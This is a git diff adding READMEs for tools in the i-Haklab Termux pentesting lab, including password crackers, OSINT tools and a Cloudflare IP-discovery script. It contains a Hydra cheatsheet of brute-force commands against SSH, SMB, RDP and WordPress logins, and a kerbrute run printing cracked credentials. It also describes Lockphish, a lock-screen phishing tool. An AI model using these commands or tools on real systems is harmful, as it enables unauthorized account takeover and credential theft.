+1,65 @@ +# hash-identifier + +![alt text](https://raw.githubusercontent.com/blackploit/hash-identifier/master/screenshots/hash_id_v1.2.png) + +Software to identify the different types of hashes used to encrypt data and especially passwords. + +Encryption formats supported: + +* ADLER-32 +* CRC-32 +* CRC-32B +* CRC-16 +* CRC-16-CCITT +* DES(Unix) +* FCS-16 +* GHash-32-3 +* GHash-32-5 +* GOST R 34.11-94 +* Haval-160 +* Haval-192 110080 ,Haval-224 114080 ,Haval-256 +* Lineage II C4 +* Domain Cached Credentials +* XOR-32 +* MD5(Half) +* MD5(Middle) +* MySQL +* MD5(phpBB3) +* MD5(Unix) +* MD5(Wordpress) +* MD5(APR) +* Haval-128 +* MD2 +* MD4 +* MD5 +* MD5(HMAC(Wordpress)) +* NTLM +* RAdmin v2.x +* RipeMD-128 +* SNEFRU-128 +* Tiger-128 +* MySQL5 - SHA-1(SHA-1($pass)) +* MySQL 160bit - SHA-1(SHA-1($pass)) +* RipeMD-160 +* SHA-1 +* SHA-1(MaNGOS) +* Tiger-160 +* Tiger-192 +* md5($pass.$salt) - Joomla +* SHA-1(Django) +* SHA-224 +* RipeMD-256 +* SNEFRU-256 +* md5($pass.$salt) - Joomla +* SAM - (LM_hash:NT_hash) +* SHA-256(Django) +* RipeMD-320 +* SHA-384 +* SHA-256 +* SHA-384(Django) +* SHA-512 +* Whirlpool +* And more… + + +Encryption algorithms that can not be differentiated unless they have been decrypted, so the efficiency of the software also depends on the user's criteria. diff --git a/.deb/home/.local/etc/i-Haklab/Tools/Readme/H/hatcloud.md b/.deb/home/.local/etc/i-Haklab/Tools/Readme/H/hatcloud.md new file mode 100755 index 00000000..3bf4030b --- /dev/null +++ b/.deb/home/.local/etc/i-Haklab/Tools/Readme/H/hatcloud.md @@ -0,0 +1,34 @@ +# HatCloud + +HatCloud build in Ruby. It makes bypass in CloudFlare for discover real IP. +This can be useful if you need test your server and website. Testing your protection against Ddos (Denial of Service) or Dos. +CloudFlare is services and distributed domain name server services, sitting between the visitor and the Cloudflare user's hosting provider, acting as a reverse proxy for websites. +Your network protects, speeds up and improves availability for a website or the mobile application with a DNS change. + +Version: 1.0 + +Use: +ruby hatcloud.rb -h or --help
+ruby hatcloud.rb -b your site
+or
+ruby hatcloud.rb --byp your site
+ + + +HatCloud, um simples script criado em Ruby para realizar um bypass no CloudFlare, descobrindo seu endereço de IP real. +Isto pode ser útil para você testar o seu servidor e seu site. Testando sua proteção contra Ddos ou Dos (negação de serviço) . + +CloudFlare fornece uma rede de entrega de conteúdo e serviços distribuídos de DNS, sendo o intermediário entre o visitante e o +provedor de hospedagem do usuário da Cloudflare, atuando como um proxy reverso para website. A sua rede protege, acelera e melhora a +disponibilidade de um website ou aplicação móvel com uma mudança no DNS. + +Versão: 1.0 + +Uso: +ruby hatcloud.rb -b seu site
+ou
+ruby hatcloud.rb --byp seu site
+ +#Screenshot +
+ diff --git a/.deb/home/.local/etc/i-Haklab/Tools/Readme/H/hunner.md b/.deb/home/.local/etc/i-Haklab/Tools/Readme/H/hunner.md new file mode 100755 index 00000000..af2daa42 --- /dev/null +++ b/.deb/home/.local/etc/i-Haklab/Tools/Readme/H/hunner.md @@ -0,0 +1,11 @@ +# Hunner +Hacking framework +This framework is designed to perform penetration testing. +Its functions: +1) Scan sql vulnerability +2) Scan xxs vulnerability +3) Dos sites +4) Brutforce Ftp +5) Brutforse SSh +6) Brutforse mail Accounts +# Donate BTC: 1K96gLXbmgRhE7DsU33HFBuvohDgei5Z22 diff --git a/.deb/home/.local/etc/i-Haklab/Tools/Readme/H/hydra.md b/.deb/home/.local/etc/i-Haklab/Tools/Readme/H/hydra.md new file mode 100755 index 00000000..dfc7d4eb --- /dev/null +++ b/.deb/home/.local/etc/i-Haklab/Tools/Readme/H/hydra.md @@ -0,0 +1,25 @@ +# Hydra-Cheatsheet +Hydra Password Cracking Cheetsheet + +The following table uses the $ip variable which can be set with the following command: + +`export ip 10.10.10.1` + +|-------------------------------------------------------------------------------------------------------------------------------------------|------------------------------------------------------| +| Command | Description | +|-------------------------------------------------------------------------------------------------------------------------------------------|------------------------------------------------------| +| hydra -P password-file.txt -v $ip snmp | Hydra brute force against SNMP | +| hydra -t 1 -l admin -P /usr/share/wordlists/rockyou.txt -vV $ip ftp | Hydra FTP known user and rockyou password list | +| hydra -v -V -u -L users.txt -P passwords.txt -t 1 -u $ip ssh | Hydra SSH using list of users and passwords | +| hydra -v -V -u -L users.txt -p "" -t 1 -u $ip ssh | Hydra SSH using a known password and a username list | +| hydra $ip -s 22 ssh -l -P big_wordlist.txt | Hydra SSH Against Known username on port 22 | +| hydra -l USERNAME -P /usr/share/wordlistsnmap.lst -f $ip pop3 -V | Hydra POP3 Brute Force | +| hydra -P /usr/share/wordlistsnmap.lst $ip smtp -V | Hydra SMTP Brute Force | +| hydra -L ./webapp.txt -P ./webapp.txt $ip http-get /admin | Hydra attack http get 401 login with a dictionary | +| hydra -t 1 -V -f -l administrator -P /usr/share/wordlists/rockyou.txt rdp://$ip | Hydra attack Windows Remote Desktop with rockyou | +| hydra -t 1 -V -f -l administrator -P /usr/share/wordlists/rockyou.txt $ip smb | Hydra brute force SMB user with rockyou: | +| hydra -l admin -P ./passwordlist.txt $ip -V http-form-post '/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log In&testcookie=1:S=Location' | Hydra brute force a Wordpress admin login | +| hydra -L usernames.txt -P passwords.txt $ip smb -V -f | SMB Brute Forcing | +| hydra -L users.txt -P passwords.txt $ip ldap2 -V -f | LDAP Brute Forcing | +|-------------------------------------------------------------------------------------------------------------------------------------------|------------------------------------------------------| + diff --git a/.deb/home/.local/etc/i-Haklab/Tools/Readme/I/i-Haklab.md b/.deb/home/.local/etc/i-Haklab/Tools/Readme/I/i-Haklab.md new file mode 100755 index 00000000..c70b909b --- /dev/null +++ b/.deb/home/.local/etc/i-Haklab/Tools/Readme/I/i-Haklab.md @@ -0,0 +1,111 @@ +# i-Haklab v.3.0 2021 by @Ivam3 + + DISCLAIMER +If the law is violated with it's use, this would be the responsibility of the user who handled it.. +Ivam3 is not responsible for the misuse that can be given to everything that this laboratory entails + +To get help about how to use it join to irc chat in i-Haklab command : + + $ i-Haklab weechat + +To report some issues join to >> https://t.me/Ivam3_Bot + +# What is i-Haklab ? + +- i-Haklab is a hacking laboratory for Termux that contains open source tools for pentesting, scan/find vulnerabilities, explotation and post-explotation recommended by Ivam3 with automation hacking commands and many guides and tutorials to learn use it. i-Haklab use oh my fish insteractive shell, to get help about its use going to >> https://fishshell.com/docs/current/tutorial.html. + +# Process during installation + +i-Haklab will ...... +- check if your android device has some root, if so, it will install the sudo command. +- check if termux has permission to access the external memory, thus, in there it will create a directory called 'tools' and there will install the tools and/or frameworks. otherwise they will be installed in the directory /data/data/com.termux/files/usr/share/tools. By the way, in case of Termux is installed in a second partition of your external memory those will be in /data/sdext2/data/com.termux/files/use/share/tools. +- i-Haklab has more than 80 tools of which only the main ones are installed (15) with a total weight of 3.9GB. -DoS-A-Tool -ExiF -Binchecker -Blackbox -Crunch -Torvpn -Tmate -Evilurl -Translate -Metasploit -EMBED -Java -Hydra -XHydra -Wireshark -Nmap -H8mail -Objection So, you can see the list of all tools available under the command: + + ]> i-Haklab list + +- The rest of the tools can be installed or uninstalled by: + + ]> i-Haklab install/remove + +- Either install or uninstall all at once: + + ]> i-Haklab install/remove alltools + +- Once tools/frameworks installation ended the OMF shell configuration will the next. on it, i-Haklab will activate the OMF shell, and you will notice it when a welcome message to the new shell appears ... when this happens you will have to wait 2min and execute the command "exit "for the continuation of its installation. + +- At the end of its installation you will only have to restart Termux and it will show an loggin screen asking you for the access key, which by default will be "Ivam3byCinderella", and can be modified from its configuration menu that is shown when using "IbyC" as the access key. + +# COMMANDS + +There are several commands in i-Haklab that facilitate the use of Termux: + +- i-Haklab: it is the main command that helps to update and use i-Haklab with automations of various processes such as the installation/uninstallation of tools, visualization of user guides for the tools, download of hacking books, access to the community tutorials, payload creation automation, metaploit handler activation, brute force attacks among others. + +- run: facilitates the execution of all external tools adapted to Termux by i-Haklab. Termux natives such as nmap run directly. + +- LOCALHOST: returns the private ip of your local network + +- omf theme name-of-theme: change the shell theme. + +- tornvpn: enable tor connection by proxychains4. + +- sudo some-commands: run commands as fake root user. + +- serverphp: activates the php server. + +- serverapache: activates the apache server. + +- postgresql start / stop / restart: enables stops and restarts the metasploit database. + +- traductor: init a shell to traslate any text. + +- vncserver: init a GUI client-server. + +- vncserver kill :1: kill the client-server. + +- IbyC-fixer: we know that each Android is different and this can generate various errors in the installation processes of ruby gems, python modules, among others. And this command is the i-Haklab solver that automates the solving processes. + +- lock: Block the termux screen and it will only be unlocked with said password or answering the security question. It is worth mentioning that these access codes are encrypted for your security. + + +# IRC CHAT Ivam3byCinderella + +IRC (Internet Relay Chat) is an application layer protocol that facilitates communication in the form of text. The chat process works on a client/server networking model. Under the command we will find the argument, with which you can join the official IRC Ivam3byCinderella where u can contact another i-Haklab. + +**** If you want to suggest some tool, do it in the section of suggestions of community bot in https://t.me/Ivam3_Bot + +# BOOKS AVAILABLES + +- Aprende html +- Chema alonso coleccion +- Comandos basicos linux +- Cracking sin secretos +- Conviertete en hacker by incube2 +- Ethical hacking +- Hacking con python +- Hacking etico 101 +- Hacking mexico seguridadofensiva nv.1 +- Hacking the hacker +- Manual hacking dispositivos moviles +- Metasploit para pentesters +- My sql +- Nmap by computaxion +- Programa en C +- Programa en C++ +- Programa en bash +- Programacion en perl +- Programacion en php +- Programacion en ruby +- Python para todos + +**** If you want to suggest some book do it in the section of suggestions of my bot in https://t.me/Ivam3_Bot + +# UPDATE AT NEWEST VERSION + +i-Haklab is constantly updating tools and improvements. To stay updated you just have to run: + + ]> i-Haklab update + +*** HAVE A NICE HACKING DAY!!!! + +# @Ivam3 diff --git a/.deb/home/.local/etc/i-Haklab/Tools/Readme/I/infoga.md b/.deb/home/.local/etc/i-Haklab/Tools/Readme/I/infoga.md new file mode 100755 index 00000000..de5ed695 --- /dev/null +++ b/.deb/home/.local/etc/i-Haklab/Tools/Readme/I/infoga.md @@ -0,0 +1,73 @@ +## Infoga - Email OSINT + +Infoga is a tool gathering email accounts informations (ip,hostname,country,...) from different public source (search engines, pgp key servers and shodan) and check if emails was leaked using haveibeenpwned.com API. Is a really simple tool, but very effective for the early stages of a penetration test or just to know the visibility of your company in the Internet. + + ![screen](https://raw.githubusercontent.com/m4ll0k/Infoga/master/screen/main.png) + +## Installation + +``` +$ git clone https://github.com/m4ll0k/Infoga.git +$ cd Infoga +$ python setup.py install +$ python infoga.py +``` +## Python 2 Support +As of January 1st, 2020 no new bug reports, fixes, or changes will be made to Python 2, and Python 2 is no longer supported. +it means no new update to python2 and updated version of os's doesn't support python2 anymore. +but you can still use the tool +``` +$ git clone https://github.com/m4ll0k/Infoga.git +$ cd Infoga +$ wget https://bootstrap.pypa.io/pip/2.7/get-pip.py +$ python get-pip.py +$ pip2 install -r requirements.txt +$ python setup.py install + +``` + +### This script is Tested in Kali linx , Parrot os , Ubuntu os + +## Usage + +``` +$ python infoga.py --domain nsa.gov --source all --breach -v 2 --report ../nsa_gov.txt +``` + +![run_1](https://raw.githubusercontent.com/m4ll0k/Infoga/master/screen/run_2.png) + + +``` +$ python infoga.py --info m4ll0k@protonmail.com --breach -v 3 --report ../m4ll0k.txt +``` + +![info](https://raw.githubusercontent.com/m4ll0k/Infoga/master/screen/image_5.png) + + +## Support Docker +### Install Docker Linux +Install Docker +```sh +curl -fsSL https://get.docker.com | bash +``` +> To use docker you need superuser power + +### Build Image dirsearch +To create image +```sh +docker build -t "infoga:1" . +``` +> **dirsearch** this is name the image and **1** is version + +### Using dirsearch +For using +```sh +docker run -it --rm "infoga:1" --domain target --source all --breach -v 2 +``` +> target is the site + +### Adding persistent volume +For example +```sh +docker run -it --rm "infoga:1" -v /tmp/infoga-report:/tmp --domain target --source all --breach -v 2 --report /tmp/report.txt +``` diff --git a/.deb/home/.local/etc/i-Haklab/Tools/Readme/I/ipgeolacation.md b/.deb/home/.local/etc/i-Haklab/Tools/Readme/I/ipgeolacation.md new file mode 100755 index 00000000..03c7c65d --- /dev/null +++ b/.deb/home/.local/etc/i-Haklab/Tools/Readme/I/ipgeolacation.md @@ -0,0 +1,140 @@ +# IPGeoLocation +==== +* A tool to retrieve IP Geolocation information +* Powered by [ip-api](http://ip-api.com/docs/) + + +Requirements +===== +* Python 3.x +* termcolor +* colorama + + +Download/Installation +==== +* git clone https://github.com/maldevel/IPGeoLocation +* pip3 install -r requirements.txt --user + +if pip3 is missing: +* apt-get install python3-setuptools +* easy_install3 pip +* pip3 install -r requirements.txt + + +Features +==== +* Retrieve IP or Domain Geolocation. +* Retrieve your own IP Geolocation. +* Retrieve Geolocation for IPs or Domains loaded from file. Each target in new line. +* Define your own custom User Agent string. +* Select random User-Agent strings from file. Each User Agent string in new line. +* Proxy support. +* Select random proxy from file. Each proxy URL in new line. +* Open IP geolocation in Google Maps using the default browser. +* Export results to csv, xml and txt format. + + +Geolocation Information +==== +* ASN +* City +* Country +* Country Code +* ISP +* Latitude +* Longtitude +* Organization +* Region Code +* Region Name +* Timezone +* Zip Code + + +Usage +==== +``` +$ ./ip2geolocation.py +usage: ipgeolocation.py [-h] [-m] [-t TARGET] [-T file] [-u User-Agent] + [-U file] [-g] [--noprint] [-v] [--nolog] [-x PROXY] + [-X file] [-e file] [-ec file] [-ex file] + +IPGeolocation 2.0.4 + +--[ Retrieve IP Geolocation information from ip-api.com +--[ Copyright (c) 2015-2016 maldevel (@maldevel) +--[ ip-api.com service will automatically ban any IP addresses doing over 150 requests per minute. + +optional arguments: + -h, --help show this help message and exit + -m, --my-ip Get Geolocation info for my IP address. + -t TARGET, --target TARGET + IP Address or Domain to be analyzed. + -T file, --tlist file + A list of IPs/Domains targets, each target in new line. + -u User-Agent, --user-agent User-Agent + Set the User-Agent request header (default: IP2GeoLocation 2.0.3). + -U file, --ulist file + A list of User-Agent strings, each string in new line. + -g Open IP location in Google maps with default browser. + --noprint IPGeolocation will print IP Geolocation info to terminal. It is possible to tell IPGeolocation n +ot to print results to terminal with this option. + -v, --verbose Enable verbose output. + --nolog IPGeolocation will save a .log file. It is possible to tell IPGeolocation not to save those log +files with this option. + -x PROXY, --proxy PROXY + Setup proxy server (example: http://127.0.0.1:8080) + -X file, --xlist file + A list of proxies, each proxy url in new line. + -e file, --txt file Export results. + -ec file, --csv file Export results in CSV format. + -ex file, --xml file Export results in XML format. +``` + + +Examples +==== +**Retrieve your IP Geolocation** +* ./ip2geolocation.py -m + +**Retrieve IP Geolocation** +* ./ip2geolocation.py -t x.x.x.x + +**Retrieve Domain Geolocation** +* ./ip2geolocation.py -t example.com + +**Do not save .log files** +* ./ip2geolocation.py -t example.com --nolog + +**Custom User Agent string** +* ./ip2geolocation.py -t x.x.x.x -u "Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; rv:11.0) like Gecko" + +**Using Proxy** +* ./ip2geolocation.py -t x.x.x.x -x http://127.0.0.1:8080 + +**Using random Proxy** +* ./ip2geolocation.py -t x.x.x.x -X /path/to/proxies/filename.txt + +**Pick User-Agent string randomly** +* ./ip2geolocation.py -t x.x.x.x -U /path/to/user/agent/strings/filename.txt + +**Retrieve IP geolocation and open location in Google maps with default browser** +* ./ip2geolocation.py -t x.x.x.x -g + +**Export results to CSV file** +* ./ip2geolocation.py -t x.x.x.x --csv /path/to/results.csv + +**Export results to XML file** +* ./ip2geolocation.py -t x.x.x.x --xml /path/to/results.xml + +**Export results to TXT file** +* ./ip2geolocation.py -t x.x.x.x -e /path/to/results.txt + +**Retrieve IP Geolocation for many targets** +* ./ip2geolocation.py -T /path/to/targets/targets.txt + +**Retrieve IP Geolocation for many targets and export results to xml** +* ./ip2geolocation.py -T /path/to/targets/targets.txt --xml /path/to/results.xml + +**Do not print results to terminal** +* ./ip2geolocation.py -m -e /path/to/results.txt --noprint diff --git a/.deb/home/.local/etc/i-Haklab/Tools/Readme/J/johnTheRipper.md b/.deb/home/.local/etc/i-Haklab/Tools/Readme/J/johnTheRipper.md new file mode 100755 index 00000000..3a6a2569 --- /dev/null +++ b/.deb/home/.local/etc/i-Haklab/Tools/Readme/J/johnTheRipper.md @@ -0,0 +1,187 @@ +[![Build Status](https://travis-ci.com/magnumripper/JohnTheRipper.svg?branch=bleeding-jumbo)](https://travis-ci.com/magnumripper/JohnTheRipper) +[![Circle CI](https://circleci.com/gh/magnumripper/JohnTheRipper/tree/bleeding-jumbo.svg?style=shield)](https://circleci.com/gh/magnumripper/JohnTheRipper/tree/bleeding-jumbo) +[![Downloads](https://img.shields.io/badge/Download-Windows%20Build-blue.svg)](https://github.com/claudioandre-br/JohnTheRipper/releases/tag/jumbo-dev) +[![License](https://img.shields.io/badge/License-GPL%20v2%2B-blue.svg)](https://github.com/magnumripper/JohnTheRipper/blob/bleeding-jumbo/doc/LICENSE) +[![LoC](https://tokei.rs/b1/github/magnumripper/JohnTheRipper?category=code)](https://github.com/magnumripper/JohnTheRipper/tree/bleeding-jumbo) +[![Contributors](https://img.shields.io/github/contributors/magnumripper/JohnTheRipper.svg?label=Contributors)](https://github.com/magnumripper/JohnTheRipper/graphs/contributors) +[![Search hit](https://img.shields.io/github/search/magnumripper/JohnTheRipper/goto.svg?label=GitHub%20Hits)](https://github.com/search?utf8=%E2%9C%93&q=john%20the%20ripper&type=) + +John the Ripper +=============== + +This is the community-enhanced, "jumbo" version of John the Ripper. +It has a lot of code, documentation, and data contributed by jumbo +developers and the user community. It is easy for new code to be added +to jumbo, and the quality requirements are low, although lately we've +started subjecting all contributions to quite some automated testing. +This means that you get a lot of functionality that is not necessarily +"mature", which in turn means that bugs in this code are to be expected. + +John the Ripper homepage is: + +https://www.openwall.com/john/ + +If you have any comments on this release or on JtR in general, please +join the john-users mailing list and post in there: + +https://www.openwall.com/lists/john-users/ + +For contributions to John the Ripper jumbo, please use pull requests on +GitHub: + +https://github.com/magnumripper/JohnTheRipper/blob/bleeding-jumbo/CONTRIBUTING.md + +Included below is basic John the Ripper core documentation. + +--- + + John the Ripper password cracker. + +John the Ripper is a fast password cracker, currently available for +many flavors of Unix, macOS, Windows, DOS, BeOS, and OpenVMS (the latter +requires a contributed patch). Its primary purpose is to detect weak +Unix passwords. Besides several crypt(3) password hash types most +commonly found on various Unix flavors, supported out of the box are +Kerberos/AFS and Windows LM hashes, as well as DES-based tripcodes, plus +hundreds of additional hashes and ciphers in "-jumbo" versions. + + + How to install. + +See INSTALL for information on installing John on your system. + + + How to use. + +To run John, you need to supply it with some password files and +optionally specify a cracking mode, like this, using the default order +of modes and assuming that "passwd" is a copy of your password file: + + john passwd + +or, to restrict it to the wordlist mode only, but permitting the use +of word mangling rules: + + john --wordlist=password.lst --rules passwd + +Cracked passwords will be printed to the terminal and saved in the +file called $JOHN/john.pot (in the documentation and in the +configuration file for John, "$JOHN" refers to John's "home +directory"; which directory it really is depends on how you installed +John). The $JOHN/john.pot file is also used to not load password +hashes that you already cracked when you run John the next time. + +To retrieve the cracked passwords, run: + + john --show passwd + +While cracking, you can press any key for status, or 'q' or Ctrl-C to +abort the session saving its state to a file ($JOHN/john.rec by +default). If you press Ctrl-C for a second time before John had a +chance to complete handling of your first Ctrl-C, John will abort +immediately without saving. By default, the state is also saved every +10 minutes to permit for recovery in case of a crash. + +To continue an interrupted session, run: + + john --restore + +These are just the most essential things you can do with John. For +a complete list of command line options and for more complicated usage +examples you should refer to OPTIONS and EXAMPLES, respectively. + +Please note that "binary" (pre-compiled) distributions of John may +include alternate executables instead of just "john". You may need to +choose the executable that fits your system best, e.g. "john-omp" to +take advantage of multiple CPUs and/or CPU cores. + + + Features. + +John the Ripper is designed to be both feature-rich and fast. It +combines several cracking modes in one program and is fully +configurable for your particular needs (you can even define a custom +cracking mode using the built-in compiler supporting a subset of C). +Also, John is available for several different platforms which enables +you to use the same cracker everywhere (you can even continue a +cracking session which you started on another platform). + +Out of the box, John supports (and autodetects) the following Unix +crypt(3) hash types: traditional DES-based, "bigcrypt", BSDI extended +DES-based, FreeBSD MD5-based (also used on Linux and in Cisco IOS), and +OpenBSD Blowfish-based (now also used on some Linux distributions and +supported by recent versions of Solaris). Also supported out of the box +are Kerberos/AFS and Windows LM (DES-based) hashes, as well as DES-based +tripcodes. + +When running on Linux distributions with glibc 2.7+, John 1.7.6+ +additionally supports (and autodetects) SHA-crypt hashes (which are +actually used by recent versions of Fedora and Ubuntu), with optional +OpenMP parallelization (requires GCC 4.2+, needs to be explicitly +enabled at compile-time by uncommenting the proper OMPFLAGS line near +the beginning of the Makefile). + +Similarly, when running on recent versions of Solaris, John 1.7.6+ +supports and autodetects SHA-crypt and SunMD5 hashes, also with +optional OpenMP parallelization (requires GCC 4.2+ or recent Sun Studio, +needs to be explicitly enabled at compile-time by uncommenting the +proper OMPFLAGS line near the beginning of the Makefile and at runtime +by setting the OMP_NUM_THREADS environment variable to the desired +number of threads). + +"-jumbo" versions add support for hundreds of additional hash and cipher +types, including fast built-in implementations of SHA-crypt and SunMD5, +Windows NTLM (MD4-based) password hashes, various macOS and Mac OS X +user password hashes, fast hashes such as raw MD5, SHA-1, SHA-256, and +SHA-512 (which many "web applications" historically misuse for +passwords), various other "web application" password hashes, various SQL +and LDAP server password hashes, and lots of other hash types, as well +as many non-hashes such as SSH private keys, S/Key skeykeys files, +Kerberos TGTs, encrypted filesystems such as macOS .dmg files and +"sparse bundles", encrypted archives such as ZIP (classic PKZIP and +WinZip/AES), RAR, and 7z, encrypted document files such as PDF and +Microsoft Office's - and these are just some examples. To load some of +these larger files for cracking, a corresponding bundled *2john program +should be used first, and then its output fed into JtR -jumbo. + + + Graphical User Interface (GUI). + +There is an official GUI for John the Ripper: Johnny. + +Despite the fact that Johnny is oriented onto JtR core, all basic +functionality is supposed to work in all versions, including jumbo. + +Johnny is a separate program, therefore you need to have John the Ripper +installed in order to use it. + +More information about Johnny and its releases is on the wiki: + +https://openwall.info/wiki/john/johnny + + + Documentation. + +The rest of documentation is located in separate files, listed here in +the recommended order of reading: + +* INSTALL - installation instructions +* OPTIONS - command line options and additional utilities +* MODES - cracking modes: what they are +* CONFIG (*) - how to customize +* RULES (*) - wordlist rules syntax +* EXTERNAL (*) - defining an external mode +* EXAMPLES - usage examples - strongly recommended +* FAQ - guess +* CHANGES (*) - history of changes +* CONTACT (*) - how to contact the author or otherwise obtain support +* CREDITS (*) - credits +* LICENSE - copyrights and licensing terms +* COPYING - GNU GPL version 2, as referenced by LICENSE above + +(*) most users can safely skip these. + +There are a lot of additional documentation files in jumbo's "doc" +directory, which you'll also want to explore. + +Happy reading! diff --git a/.deb/home/.local/etc/i-Haklab/Tools/Readme/K/kerbrute.md b/.deb/home/.local/etc/i-Haklab/Tools/Readme/K/kerbrute.md new file mode 100755 index 00000000..6fa4ca2a --- /dev/null +++ b/.deb/home/.local/etc/i-Haklab/Tools/Readme/K/kerbrute.md @@ -0,0 +1,60 @@ +# kerbrute +An script to perform kerberos bruteforcing by using the Impacket library. + +When is executed, as input it receives a user or list of users and a password or list of password. Then is performs a brute-force attack to enumerate: +* Valid username/passwords pairs +* Valid usernames +* Usernames without pre-authentication required + +As a result, the script generates a list of valid credentials discovered, and the TGT's generated due those valid credentials. + +## Installation + +To install: +``` +lsgit clone https://github.com/TarlogicSecurity/kerbrute +cd kerbrute +pip install -r requirements.txt +``` + +## Use + +Help without arguments: +```shell +root@kali:kerbrute# python kerbrute.py +Impacket v0.9.18 - Copyright 2018 SecureAuth Corporation + +usage: kerbrute.py [-h] [-debug] (-user USER | -users USERS) + [-password PASSWORD | -passwords PASSWORDS] -domain DOMAIN + [-dc-ip ] [-threads THREADS] + [-outputfile OUTPUTFILE] [-no-save-ticket] + +optional arguments: + -h, --help show this help message and exit + -debug Turn DEBUG output ON + -user USER User to perform bruteforcing + -users USERS File with user per line + -password PASSWORD Password to perform bruteforcing + -passwords PASSWORDS File with password per line + -domain DOMAIN Domain to perform bruteforcing + -dc-ip IP Address of the domain controller + -threads THREADS Number of threads to perform bruteforcing. Default = 1 + -outputfile OUTPUTFILE + File to save discovered user:password + -no-save-ticket Do not save retrieved TGTs with correct credentials + +Examples: + ./kerbrute.py -users users_file.txt -passwords passwords_file.txt -domain contoso.com +``` + +Example of execution: +```shell +root@kali:kerbrute# python kerbrute.py -domain jurassic.park -users users.txt -passwords passwords.txt -outputfile jurassic_passwords.txt +Impacket v0.9.18 - Copyright 2018 SecureAuth Corporation + +[*] Stupendous => triceratops:Sh4rpH0rns +[*] Saved TGT in triceratops.ccache +[*] Valid user => velociraptor [NOT PREAUTH] +[*] Valid user => trex +[*] Saved discovered passwords in jurassic_passwords.txt +``` diff --git a/.deb/home/.local/etc/i-Haklab/Tools/Readme/L/localtunnel.md b/.deb/home/.local/etc/i-Haklab/Tools/Readme/L/localtunnel.md new file mode 100755 index 00000000..9c829f00 --- /dev/null +++ b/.deb/home/.local/etc/i-Haklab/Tools/Readme/L/localtunnel.md @@ -0,0 +1,70 @@ +# localtunnel-server + +[![Build Status](https://travis-ci.org/localtunnel/server.svg?branch=master)](https://travis-ci.org/localtunnel/server) + +localtunnel exposes your localhost to the world for easy testing and sharing! No need to mess with DNS or deploy just to have others test out your changes. + +This repo is the server component. If you are just looking for the CLI localtunnel app, see (https://github.com/localtunnel/localtunnel). + +## overview ## + +The default localtunnel client connects to the `localtunnel.me` server. You can, however, easily set up and run your own server. In order to run your own localtunnel server you must ensure that your server can meet the following requirements: + +* You can set up DNS entries for your `domain.tld` and `*.domain.tld` (or `sub.domain.tld` and `*.sub.domain.tld`). +* The server can accept incoming TCP connections for any non-root TCP port (i.e. ports over 1000). + +The above are important as the client will ask the server for a subdomain under a particular domain. The server will listen on any OS-assigned TCP port for client connections. + +#### setup + +```shell +# pick a place where the files will live +git clone git://github.com/defunctzombie/localtunnel-server.git +cd localtunnel-server +npm install + +# server set to run on port 1234 +bin/server --port 1234 +``` + +The localtunnel server is now running and waiting for client requests on port 1234. You will most likely want to set up a reverse proxy to listen on port 80 (or start localtunnel on port 80 directly). + +**NOTE** By default, localtunnel will use subdomains for clients, if you plan to host your localtunnel server itself on a subdomain you will need to use the _--domain_ option and specify the domain name behind which you are hosting localtunnel. (i.e. my-localtunnel-server.example.com) + +#### use your server + +You can now use your domain with the `--host` flag for the `lt` client. + +```shell +lt --host http://sub.example.tld:1234 --port 9000 +``` + +You will be assigned a URL similar to `heavy-puma-9.sub.example.com:1234`. + +If your server is acting as a reverse proxy (i.e. nginx) and is able to listen on port 80, then you do not need the `:1234` part of the hostname for the `lt` client. + +## REST API + +### POST /api/tunnels + +Create a new tunnel. A LocalTunnel client posts to this enpoint to request a new tunnel with a specific name or a randomly assigned name. + +### GET /api/status + +General server information. + +## Deploy + +You can deploy your own localtunnel server using the prebuilt docker image. + +**Note** This assumes that you have a proxy in front of the server to handle the http(s) requests and forward them to the localtunnel server on port 3000. You can use our [localtunnel-nginx](https://github.com/localtunnel/nginx) to accomplish this. + +If you do not want ssl support for your own tunnel (not recommended), then you can just run the below with `--port 80` instead. + +``` +docker run -d \ + --restart always \ + --name localtunnel \ + --net host \ + defunctzombie/localtunnel-server:latest --port 3000 +``` diff --git a/.deb/home/.local/etc/i-Haklab/Tools/Readme/L/lockphish.md b/.deb/home/.local/etc/i-Haklab/Tools/Readme/L/lockphish.md new file mode 100755 index 00000000..cde24fab --- /dev/null +++ b/.deb/home/.local/etc/i-Haklab/Tools/Readme/L/lockphish.md @@ -0,0 +1,31 @@ +# Lockphish v1.0 + +Lockphish it's the first tool (05/13/2020) for phishing attacks on the lock screen, designed to grab Windows credentials, Android PIN and iPhone Passcode using a https link. + +## Author: https://github.com/thelinuxchoice/lockphish +## Twitter: https://twitter.com/linux_choice + +![lp](https://user-images.githubusercontent.com/34893261/74437970-e5025000-4e47-11ea-9291-d83afd3fe008.png) + +### Features: + +#### Lockscreen phishing page for Windows, Android and iPhone +#### Auto detect device +#### Port Forwarding by Ngrok +#### IP Tracker + +## Legal disclaimer: + +Usage of Lockphish for attacking targets without prior mutual consent is illegal. It's the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program. + +### Usage: +``` +git clone https://github.com/thelinuxchoice/lockphish +cd lockphish +bash lockphish.sh +``` + +### Donate a coffee! +Support the authors: +#### Paypal: +https://www.paypal.com/cgi-bin/webscr?cmd=_s-xclick&hosted_button_id=CLKRT5QXXFJY4&source=url diff --git a/.deb/home/.local/etc/i-Haklab/Tools/Readme/M/maltego.md b/.deb/home/.local/etc/i-Haklab/Tools/Readme/M/maltego.md new file mode 100755 index 00000000..141db0df --- /dev/null +++ b/.deb/home/.local/etc/i-Haklab/Tools/Readme/M/maltego.md @@ -0,0 +1,28 @@ +# To do a basic footprinting of a domain +Machines>"Run Machine">"Footprint L1" + +# To do a footprinting and follow the every link of a domain +Machines>"Run Machine">"Footprint L2" + +# To find a person's email address from a domain +Machines>"Run Machine">"Person - Email Address" + +# To create a custom attack +Machines>"New Machine" + +# To create a new data type +Manage>"New Entity Type" + +# To run a transform on collected data +[In the graph, right click]>"Run Transform">[Select Transform] + +# To create a new way to manipulate data +Manage>"Local Transform" + +# To get latest transforms from currently set servers +Manage>"Discover Transforms">"Discover Transforms" + +# To get transforms from specific servers +Manage>"Discover Transforms">"Discover Transforms (Advanced)" + +For more information with images guides going to : https://www.hackingloops.com/maltego/ diff --git a/.deb/home/.local/etc/i-Haklab/Tools/Readme/M/metasploit.md b/.deb/home/.local/etc/i-Haklab/Tools/Readme/M/metasploit.md new file mode 100755 index 00000000..aa7ade02 --- /dev/null +++ 